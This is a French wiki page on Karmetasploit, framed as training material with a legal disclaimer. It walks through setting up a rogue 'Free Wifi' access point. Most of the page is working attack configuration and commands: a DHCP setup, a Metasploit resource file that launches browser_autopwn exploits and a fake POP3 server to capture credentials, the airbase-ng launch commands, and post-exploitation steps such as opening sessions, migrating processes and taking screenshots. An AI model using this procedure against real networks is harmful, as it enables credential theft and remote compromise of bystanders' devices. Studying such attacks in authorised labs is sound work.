Karmetasploit

De wiki.nexiat.fr
Aller à la navigation Aller à la recherche

🔒 Contenu de sécurité — usage encadré

Cette page décrit des techniques de sécurité offensive à des fins exclusivement pédagogiques et professionnelles (formation, préparation de certification, montée en compétence défensive).

Ces techniques ne doivent être mises en œuvre que dans un laboratoire isolé ou sur un système pour lequel vous disposez d'une autorisation écrite explicite du propriétaire. Les employer contre un système tiers sans autorisation est une infraction pénale (art. 323-1 et suivants du Code pénal). Voir les avertissements généraux.

Fiche express
Domaine Point d'accès Wi-Fi malveillant
Base Implémentation de KARMA dans Metasploit
Contexte Metasploit
Voir aussi Browser autopwn

Karmetasploit est l'implémentation de KARMA dans Metasploit. Il met en place un faux point d'accès Wi-Fi qui répond à toutes les sondes (beacons) des clients. Il peut ainsi capturer les identifiants des demandes de connexion et rend disponibles de faux services DNS, IMAP, POP3, SMTP, FTP, SMB et HTTP.

Serveur DHCP

Configurer un serveur DHCP servant le réseau du faux point d'accès :

option domain-name-servers 10.0.0.1;
default-lease-time 60;
max-lease-time 72;
ddns-update-style none;
authoritative;
log-facility local7;
subnet 10.0.0.0 netmask 255.255.255.0 {
   range 10.0.0.100 10.0.0.254;
   option routers 10.0.0.1;
   option domain-name-servers 10.0.0.1;
}

Sauvegarde du fichier d'origine :

cp /etc/dhcp3/dhcp3.conf /etc/dhcp3/dhcp3.conf.back

Les ressources KARMA ne sont pas fournies par défaut, il faut télécharger le fichier de ressources qui contient les exploits joués contre les navigateurs des clients :

# http://www.offensive-security.com/downloads/karma.rc

Fichier de ressources

use auxiliary/server/browser_autopwn
setg AUTOPWN_HOST 10.0.0.1
setg AUTOPWN_PORT 55550
setg AUTOPWN_URI /ads
set LHOST 10.0.0.1
set LPORT 45000
set SRVPORT 55550
set URIPATH /ads
run

use auxiliary/server/capture/pop3
set SRVPORT 110
set SSL false
run

Mettre la carte Wi-Fi en mode monitor (voir http://www.aircrack-ng.com).

Lancement de l'attaque

airbase-ng -P -C 30 -e "Free Wifi" -v mon0
ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0

Consulter les adresses distribuées :

tailf /var/log/messages

Puis charger les ressources et la base :

resource karma.rc
db_connect postgres:toor@127.0.0.1/msfbook

La cible se connecte au faux point d'accès et l'on récupère les identifiants.

Obtention du shell

L'attaque lance un grand nombre d'exploits (très verbeux). Il ne faut pas que l'utilisateur ferme son navigateur.

sessions -i 1
getuid
run migrate -f
screenshot

Voir aussi